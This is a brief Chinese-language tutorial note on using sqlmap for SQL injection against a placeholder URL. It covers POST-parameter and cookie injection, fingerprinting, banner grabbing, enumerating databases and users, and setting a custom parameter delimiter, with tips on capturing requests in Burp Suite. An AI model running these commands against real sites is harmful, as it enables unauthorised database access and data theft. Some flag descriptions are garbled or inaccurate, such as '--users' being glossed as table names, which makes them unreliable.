sqlmap -u “url” –data=“id” --data参数代表采用post方法进行注入,等于号后面的id就是所存在可以注入点的地方,将利用burspsuit软件抓包后,将注入点复制到双引号里运行即可
sqlmap -u “http://www.xxx.com” -f --banner --dbs --users(-f参数代表获取对应的指纹信息 --banner参数或许对应的banner信息 --dbs参数获取对应的数据库名 --users 获取对应的表名)
sqlmap -u “http://www.xxx.com” --data=“id” -f --banner --dbs --users 此条语句即可对目标url进行post注入 并获取指纹信息banner信息 数据库名字 表名
sqlmap -u “http://www.xxx.com” --param-del=“;” 通过post方式注入的时候,有时候–databse=“id”中的id会有两个参数,正常情况下都是用;来分割两个参数的,但是sqlmap默认将id的参数执行的时候是默认用&号进行参数分割,所以执行的时候会出现报错,那么通过–param-del=";"参数将双引号中填入对应的分割参数,继续运行sqlmap即可。
sqlmap -u “http://www.xxx.com” --cookie “” 当需要通过cookie进行注入的时候选择的参数设置,通过burpsuit进行抓取cookie 进行复制即可。